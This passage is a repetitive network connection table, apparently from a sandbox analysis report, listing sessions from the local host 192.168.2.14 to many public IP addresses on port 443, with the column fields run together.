                                              15533192.168.2.1452552155.204.228.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15534192.168.2.144647671.110.129.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15535192.168.2.1452464111.247.201.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15536192.168.2.145491068.9.34.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15537192.168.2.145838664.184.187.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15538192.168.2.145066439.37.207.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15539192.168.2.1437386206.19.2.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15540192.168.2.1444316161.236.29.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15541192.168.2.1434914222.44.212.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15542192.168.2.1434024213.86.147.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15543192.168.2.1450776204.19.255.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15544192.168.2.1433754122.157.235.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15545192.168.2.143299083.114.49.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15546192.168.2.1452228211.172.36.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15547192.168.2.143604835.253.183.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15548192.168.2.1458890166.98.11.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15549192.168.2.143878838.71.185.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15550192.168.2.144247274.2.216.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15551192.168.2.143787282.140.61.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15552192.168.2.1443618145.19.12.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15553192.168.2.1451310128.20.243.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15554192.168.2.1433408169.197.152.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15555192.168.2.145156870.79.238.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15556192.168.2.1456848207.85.107.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15557192.168.2.145996895.188.63.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15558192.168.2.144387067.162.193.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15559192.168.2.1448832168.102.44.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15560192.168.2.144252682.171.56.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15561192.168.2.145251878.66.129.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15562192.168.2.1432924142.43.5.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15563192.168.2.143956678.221.255.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15564192.168.2.1447166194.155.178.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15565192.168.2.1443992140.155.163.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15566192.168.2.1440252221.81.143.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15567192.168.2.14459884.152.212.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15568192.168.2.144233271.2.36.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15569192.168.2.145861425.165.7.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15570192.168.2.144792646.30.78.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15571192.168.2.1434084110.201.218.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15572192.168.2.1433966199.236.164.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15573192.168.2.1450892159.34.89.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15574192.168.2.144349614.188.185.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15575192.168.2.1452232222.46.87.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15576192.168.2.145627898.247.239.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15577192.168.2.144017081.74.178.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15578192.168.2.144004824.95.147.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15579192.168.2.145606283.80.47.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15580192.168.2.1443160133.41.230.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15581192.168.2.1446204112.129.210.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15582192.168.2.1454476223.223.226.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15583192.168.2.1443788201.141.136.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15584192.168.2.1440172171.78.165.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15585192.168.2.1433596176.216.79.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15586192.168.2.143463436.126.7.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15587192.168.2.1443304134.126.81.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15588192.168.2.145388842.167.246.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15589192.168.2.1435784222.92.241.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15590192.168.2.144877461.94.245.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15591192.168.2.1450286194.104.134.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15592192.168.2.144820285.79.63.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15593192.168.2.1455892201.68.33.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15594192.168.2.1433038107.81.194.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15595192.168.2.143287223.238.106.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15596192.168.2.145331823.8.208.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15597192.168.2.146085883.241.38.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15598192.168.2.1459518192.160.196.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15599192.168.2.145679089.216.16.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15600192.168.2.1437338161.111.160.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15601192.168.2.1448170191.131.112.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15602192.168.2.1457620123.70.171.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15603192.168.2.1457486163.154.252.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15604192.168.2.144455845.141.146.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15605192.168.2.145984843.114.38.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15606192.168.2.1448076116.183.250.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15607192.168.2.1432836209.241.255.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15608192.168.2.1455386154.20.112.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15609192.168.2.1445088119.48.174.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15610192.168.2.1446064156.167.151.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15611192.168.2.1458930207.212.199.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15612192.168.2.145352862.64.1.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15613192.168.2.1441268205.153.170.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15614192.168.2.1452072130.27.250.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15615192.168.2.1460768156.184.42.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15616192.168.2.1448542204.240.158.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15617192.168.2.1434202174.91.141.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15618192.168.2.1442016118.58.250.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15619192.168.2.1440402195.251.75.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15620192.168.2.1436420162.99.136.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15621192.168.2.1454460101.197.153.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15622192.168.2.1443536220.176.45.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15623192.168.2.1456760188.197.181.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15624192.168.2.1452014135.177.107.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15625192.168.2.1438976177.99.110.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15626192.168.2.143772261.105.34.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15627192.168.2.145966288.240.157.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15628192.168.2.1447814115.252.152.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15629192.168.2.1436986128.216.252.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15630192.168.2.145151642.51.220.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15631192.168.2.1459860182.248.23.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15632192.168.2.1455772141.200.15.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15633192.168.2.1448226144.170.160.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15634192.168.2.1442266110.164.9.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15635192.168.2.144802678.228.188.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15636192.168.2.143794261.186.133.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15637192.168.2.144097814.182.224.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15638192.168.2.1456784125.14.196.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15639192.168.2.14427124.131.227.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15640192.168.2.144020885.245.199.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15641192.168.2.143907092.166.214.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15642192.168.2.1448860154.108.46.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15643192.168.2.144752091.126.206.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15644192.168.2.145213243.96.224.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15645192.168.2.1450358105.168.175.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15646192.168.2.1456584163.45.76.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15647192.168.2.1432784108.119.227.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15648192.168.2.143866625.63.35.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15649192.168.2.145514266.173.240.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15650192.168.2.1454502131.224.238.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15651192.168.2.145051697.164.101.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15652192.168.2.143873265.106.91.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15653192.168.2.1454564177.103.80.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15654192.168.2.145360074.121.190.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15655192.168.2.1438926147.46.81.398080
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15656192.168.2.1448624195.173.176.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15657192.168.2.1458512179.80.105.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15658192.168.2.145089612.52.40.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15659192.168.2.145021898.196.41.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15660192.168.2.143484231.101.176.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15661192.168.2.144882432.169.61.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15662192.168.2.1449066175.101.45.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15663192.168.2.1450734123.143.108.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15664192.168.2.144204488.231.203.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15665192.168.2.145949465.23.143.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15666192.168.2.1440812166.24.22.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15667192.168.2.1442648213.160.109.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15668192.168.2.143520041.123.199.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15669192.168.2.146016274.179.59.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15670192.168.2.1446510190.120.77.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15671192.168.2.145430012.47.0.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15672192.168.2.144051835.52.133.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15673192.168.2.1460634101.203.219.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15674192.168.2.1446610121.31.59.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15675192.168.2.1453856202.182.190.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15676192.168.2.143987490.51.194.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15677192.168.2.1437834202.38.28.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15678192.168.2.1442266114.190.216.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15679192.168.2.1453450222.200.24.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15680192.168.2.1433326186.238.104.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15681192.168.2.1437788138.125.249.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15682192.168.2.1449630191.13.208.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15683192.168.2.144445681.128.226.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15684192.168.2.1440036111.168.40.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15685192.168.2.145607220.154.241.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15686192.168.2.1439238108.125.19.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15687192.168.2.1459270200.114.254.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15688192.168.2.1448458156.63.231.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15689192.168.2.1440774126.64.139.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15690192.168.2.1442792114.184.64.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15691192.168.2.143598050.191.139.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15692192.168.2.144278083.45.115.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15693192.168.2.145307275.195.111.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15694192.168.2.143885075.210.94.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15695192.168.2.143821450.249.211.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15696192.168.2.1458968221.123.24.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15697192.168.2.1460986139.24.138.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15698192.168.2.143953242.202.82.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15699192.168.2.1442926103.57.152.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15700192.168.2.145485027.103.220.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15701192.168.2.144952045.201.187.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15702192.168.2.145031661.243.107.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15703192.168.2.144519246.207.48.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15704192.168.2.1456526145.2.213.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15705192.168.2.144597879.212.92.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15706192.168.2.1449136168.154.15.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15707192.168.2.145060853.158.115.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15708192.168.2.1457310105.182.140.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15709192.168.2.145183698.185.248.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15710192.168.2.1452166112.158.113.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15711192.168.2.1457850121.52.200.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15712192.168.2.1434318218.129.228.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15713192.168.2.144409291.108.138.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15714192.168.2.1437292203.224.48.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15715192.168.2.1459916159.238.133.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15716192.168.2.145235020.61.44.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15717192.168.2.143758652.121.225.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15718192.168.2.1445522122.249.209.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15719192.168.2.1458156137.24.69.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15720192.168.2.143460698.253.223.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15721192.168.2.1459620186.51.147.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15722192.168.2.143874891.148.64.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15723192.168.2.1434492113.231.31.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15724192.168.2.1452508154.126.121.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15725192.168.2.144116097.220.45.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15726192.168.2.1459626105.234.125.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15727192.168.2.1453822160.231.160.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15728192.168.2.1440224134.207.214.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15729192.168.2.1436076186.131.189.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15730192.168.2.1456626201.33.11.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15731192.168.2.145085036.188.156.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15732192.168.2.1436700213.46.241.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15733192.168.2.1455344159.136.174.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15734192.168.2.1446326116.114.106.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15735192.168.2.144567675.23.47.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15736192.168.2.1441046180.249.108.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15737192.168.2.145548860.192.150.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15738192.168.2.1436834216.29.200.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15739192.168.2.1456158119.33.109.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15740192.168.2.145542093.186.45.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15741192.168.2.146050254.119.78.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15742192.168.2.1441800217.166.234.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15743192.168.2.1436232219.148.187.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15744192.168.2.143752420.141.102.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15745192.168.2.143621061.25.162.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15746192.168.2.1443848162.249.107.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15747192.168.2.1437164133.190.224.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15748192.168.2.14356881.114.17.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15749192.168.2.1456446140.129.196.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15750192.168.2.1460218113.127.222.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15751192.168.2.1459144211.129.216.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15752192.168.2.1444344156.25.209.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15753192.168.2.1452328184.202.101.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15754192.168.2.144826678.171.190.21443
                                              TimestampBytes transferredDirectionData


